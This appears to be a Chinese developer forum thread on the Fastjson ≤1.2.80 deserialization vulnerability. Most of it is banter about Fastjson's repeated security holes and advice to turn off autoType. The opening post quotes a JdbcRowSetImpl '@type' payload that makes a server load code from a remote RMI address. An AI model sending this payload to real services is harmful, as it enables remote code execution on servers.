Fastjson 反序列化漏洞 影响版本≤1.2.80

fastJSON 几乎所有的漏洞都和 autoType 有关，这玩意儿大部分都用不到，关了之后就没啥问题，它主要解决的是反序列化的类不确定，比如 {"@type":"com.abc.biz.Label","name":"","value":""}，那么反序列化的时候就会去用 classLoader 加载 com.abc.biz.Label 这个类，如果这个类被故意攻击，用到了 jdbc 里面的类，然后就比较危险了，比如 {"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}
就能加载远程 dataSource 了，个人建议能关 autoType 就关掉，想用的话开白名单模式

没发现漏洞才是新闻吧。


还跟多国内文章推荐这个，害人不浅

不知道是第 N 次听到出漏洞的消息了

这货有哪一年不出这类漏洞?

@ychost 这个 type 貌似很多序列化库都有, 比如 jackson, 虽然但是, 我用 jackson...

现在还在用 fastjson 的一定是个加班爱好者

白学家：不会吧，不会吧，还有人敢用这玩意？

人生苦短，我选择 spring boot 默认的 hikari 和 fastjson ，能少配一点是一点
不过是代码就有漏洞，及时更新其实都没事

@chendy springboot 默认 jackson 吧？

@chendy @oneisall8955 上班摸鱼手滑了……

@Greatshu 996 福报警告

默认自带的 jackson 它不香吗，为什么还要单独引入 fastjson

累了，就这样吧，有漏洞就有吧，躺平了 [/狗头]

以前在 README 里写 gson 是龟 son 缩写的，就是 fastjson 干的吧

反序列化的时候不能确定目标类型的话，肯定是设计问题，只要完善设计，就可以规避这种问题了。所以，fastjson 这个 autoType 功能真的就是画蛇添足。

@xuanbg 怎么规避？请指教。

Fastjson 到底做错了什么？为什么会被频繁爆出漏洞？ https://www.163.com/dy/article/FGV541KF05319WXB.html

[高危安全通告] fastjson≤1.2.80 反序列化漏洞 https://juejin.cn/post/7101506799387279396

不过实际项目中，我挺喜欢用 fastjson 的啊（我是异类，狗头

5. 怎么判断是否用到了 autoType
看序列化的代码中是否用到了 SerializerFeature.WriteClassName

这东西基本没用到吧？管它呢，不升级。。

唉..很多漏洞都是默认开启一些 xxx...实际上我们根本用不到....